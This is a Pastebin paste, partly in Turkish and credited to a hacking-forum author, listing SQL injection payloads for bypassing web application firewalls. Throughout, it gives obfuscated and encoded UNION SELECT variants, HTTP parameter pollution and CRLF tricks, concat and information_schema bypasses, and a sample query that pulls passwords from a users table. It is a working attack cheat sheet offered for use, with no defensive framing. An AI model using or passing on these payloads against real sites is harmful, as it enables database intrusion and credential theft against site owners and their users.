Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- WAF Web Güvenlik Duvarı SQLi ByPass Teknikleri / ++REP Beğen Tuşuna Basalım Lütfen :cigara:
- KingSkrupellos - https://www.cyberizm.org/cyberizm-waf-web-guvenlik-duvari-sqli-bypass-teknikleri.html
- ---------------------------------------WAF BYPASS---------------------------------
- 1. Union Select :-
- (a):- /*!50000union*/ select Note:-Also can use 00000/12345 Also can use /*!' '*/
- (b):- /*!50000union*/ /*!50000select*/
- (c):- %0AUNION%23 [also can use for select too]------Dat is URL Encoded
- (d):- +--%0Aunion+--%0Aselect+
- (e):- +--%0Aunion+--%0Aselect+--%0A1,--%0A2,--%0A3,--%0A4,--%0A5 [Means also use URL Encoded technique in numbers too]
- (f):- /%2A%2A/union/%2A%2A/select/%2A%2A/ [Encode to Hex Forbidden Technique: Functions Use:- 1. /%2A%2A/ 2. %2F**%2F ]
- (g):- +UnIoN+SeLselectECT+
- (h):- Use any characters like :- |, ?, ", ', *, %, � , [], ;, :, \/, $, �, ()... ex:- +uni*on+sel*ect+
- (i):- +UnIoN+SeLeCt+
- (j):- HTTP Parameter Pollution :- /* &id= */union/* &id= */select/* &id= */
- List of all HTTP Technique:- /* &c= */
- /* &b= */
- /* &id= */
- /*&q=*/
- /*&prodID=*/
- /*&abc=*/
- q=select
- union /* and b=*/ select
- q=select/*&q=*/
- q=*/from/*
- q=select/*&q=*/name&q=password/*&q=*/
- &b= */select+1,2 /?a=1+ union/* &b= */
- q=*/name q=password/*
- ?id=1 /**/union/* &id= */select/* &id= */pwd/* &id= */from/* &id= */users
- ________________________________________________________________
- (k):- CRLF BYPASS TECHNIQUES:-
- +%0A%0D/*!%0A%0Dunion*/+%0A%0D/*!50000Select*/%0A%0D/*!
- (l):- When Fatal Error comes :-
- When this error comes then try null like this :- union select null,2,3,4,5-- error produce
- union select 1,null,2,3,4,5-- error produce
- union select 1,2,null,4,5-- no error produce
- _________________________________________________________________________
- Try this techniue untill u not get error
- (m):- {
- +--+Union+--+Select+--+
- +#uNiOn+#sEleCt+
- +union+distinct+select+
- +union+distinctROW+select+
- uni<on all sel<ect
- +union%23aa%0Aselect+
- 0%a0union%a0select%09
- %0Aunion%0Aselect%0A
- +UnIoN+SeLselectECT+
- /%2A%2A/union/%2A%2A/select/%2A%2A/
- %2f%2a*/UNION%2f%2a*/SELECT%2f%2a*/
- +%2F**%2Funion%2F**%2Fselect+
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- +%0A%0D/*!%0A%0Dunion*/+%0A%0D/*!50000Select*/%0A%0D
- /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
- %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
- union(select(0),version(),(0),(0),(0),(0),( 0),(0),(0))
- /*!50000union*/+/*!50000select*/
- UNIunionON+SELselectECT
- +union+distinct+select+
- +union+distinctROW+select+
- union+/*!select*/+1,2,3
- union/**/select/**/1,2,3
- uni%20union%20/*!select*/%20
- /**//*!union*//**//*!select*//**/
- union%23aa%0Aselect
- /**/union/*!50000select*/
- /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
- %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
- +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
- id=1+�UnI�On�+'SeL�ECT� <-MySQL only
- id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
- }
- _____________________________________________________________
- (n):- Concat Bypassing:-
- {
- group_concat()
- grOUp_ConCat(/*!*/,0x3e,/*!*/)
- group_concat(,0x3c62723e)
- g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
- CoNcAt()
- concat%00()
- %00CoNcAt()
- CONCAT(DISTINCT )
- concat(0x3a,,0x3c62723e)
- /*!50000cOnCat*/
- concat_ws()
- concat_ws(0x3a,)
- CONCAT_WS(CHAR(32,58,32),version(),)
- REVERSE(tacnoc)
- binary(version())
- uncompress(compress(version()))
- aes_decrypt(aes_encrypt(version(),1),1)
- }
- ________________________________________________________________
- (o):- Information schema Bypass :-
- 1.information_schema . tables
- 2.`information_schema`.`tables`
- 3./*!information_schema.tables*/
- 4.FROM+information_schema%20%0C%20.%20%09tables
- 5.(select+group_concat(table_name)`foo`+From+`information_schema`.`tAblES`+Where+table_ScHEmA=schEMA()) Alternatives Names:- 6.{
- information_schema.statistics
- information_schema.key_column_usage
- information_schema.table_constraints
- information_schema.partitions
- }
- 7. /*!50000column_name*/%0A%46roM%0AInfORmaTion_scHema . cOlumnS%0A%57heRe%0A/*!50000tAblE_naMe*/=hex table
- 8. (/*!50000%53elect*/%0A/*!50000%54able_name*/%0A%0A/*!50000%46roM*/%0A/*!50000%49nfORmaTion_%53cHema . %54AblES*/%0A/*!50000%57here*/%0A%54able_ScHEmA=schEMA()%0Alimit%0A0,1)
- 9. String Base SQLI:- put ' and in last use one of these :- -- - -+-- +--+/ --+- #
- like AÇIKLISİTE/id=2' --+ gibi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement